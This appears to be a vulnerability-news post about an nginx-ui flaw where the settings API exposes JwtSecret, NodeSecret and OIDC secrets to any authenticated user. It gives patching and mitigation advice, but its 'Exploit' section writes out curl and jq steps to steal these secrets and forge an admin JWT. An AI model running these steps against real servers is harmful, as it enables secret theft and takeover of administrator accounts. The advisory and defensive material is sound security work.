Listen to this Post
The vulnerability exists in the `GetSettings` API handler (api/settings/settings.go:24-65). This endpoint serializes all settings structs to JSON and returns them to any authenticated user, regardless of privilege level. The developers intended to protect sensitive fields using a custom `protected:”true”` struct tag, but this tag is only enforced during write operations via the `ProtectedFill` function in `SaveSettings` (lines 126-135). During read operations, `GetSettings` uses Go’s json.Marshal, which completely ignores custom tags and serializes all exported fields. As a result, over 40 protected fields are exposed, including `JwtSecret` (which allows forging authentication tokens for any user), `NodeSecret` (used for cluster node impersonation), OIDC `ClientSecret` (enabling OAuth account takeover), Casdoor secrets, and the `IPWhiteList` configuration. An attacker with any valid JWT can send a GET request to `/api/settings` and receive a JSON response containing all these secrets. The write-only protection means secrets cannot be overwritten but are freely readable, creating asymmetric security. Exploitation allows low-privilege users to escalate to full admin access, compromise the cluster, and bypass authentication.
DailyCVE form:
Platform: nginx-ui
Version: All versions
Vulnerability : Information disclosure
Severity: Critical
date: 2026-05-06
Prediction: 2026-05-20
What Undercode Say:
Analytics under heading What Undercode Say:
Count exposed protected fields across settings files grep -r 'protected:"true"' nginx-ui/settings/ | wc -l Identify all JSON tags of protected fields grep -r 'protected:"true"' nginx-ui/settings/ -B1 | grep 'json:"' Simulate the vulnerable API call (requires auth token) curl -X GET http://target-nginx-ui/api/settings -H "Authorization: Bearer $JWT" Filter response for JwtSecret curl -s http://target/api/settings -H "Authorization: Bearer $JWT" | jq '.app.jwt_secret'
Exploit:
Step 1: Authenticate as any low-privilege user
TOKEN=$(curl -s -X POST http://target/api/login -d '{"username":"user","password":"pass"}' | jq -r '.token')
Step 2: Fetch all settings including secrets
curl -s -X GET http://target/api/settings -H "Authorization: Bearer $TOKEN" > leaked_settings.json
Step 3: Extract NodeSecret for cluster impersonation
NODE_SECRET=$(jq -r '.node.secret' leaked_settings.json)
Step 4: Forge admin JWT using leaked jwt_secret
JWT_SECRET=$(jq -r '.app.jwt_secret' leaked_settings.json)
Use jwt_tool or python to create admin token with sub=admin
Protection from this CVE
- Apply patch that filters `protected:”true”` fields in `GetSettings` before JSON serialization (e.g., using reflection to skip those tags).
- If patch unavailable, block `/api/settings` endpoint for non-admin users via reverse proxy or RBAC.
- Rotate all secrets (
JwtSecret,NodeSecret, OIDC client secrets) immediately after patching. - Monitor logs for unauthorized access to
/api/settings.
Impact
- Authentication bypass: Forge valid JWT for any user (including admin) using leaked `JwtSecret` → permanent access.
- Cluster compromise: Impersonate any cluster node with `NodeSecret` → push malicious configs, intercept sync traffic.
- Third-party OAuth takeover: Leaked OIDC/Casdoor `ClientSecret` → perform OAuth flows as the app, compromise linked IdP accounts.
- Security config disclosure:
IPWhiteList, reload commands, paths → enable targeted network and infrastructure attacks. - Low barrier: Any authenticated user can exploit; multi-user deployments risk insider escalation to full admin.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
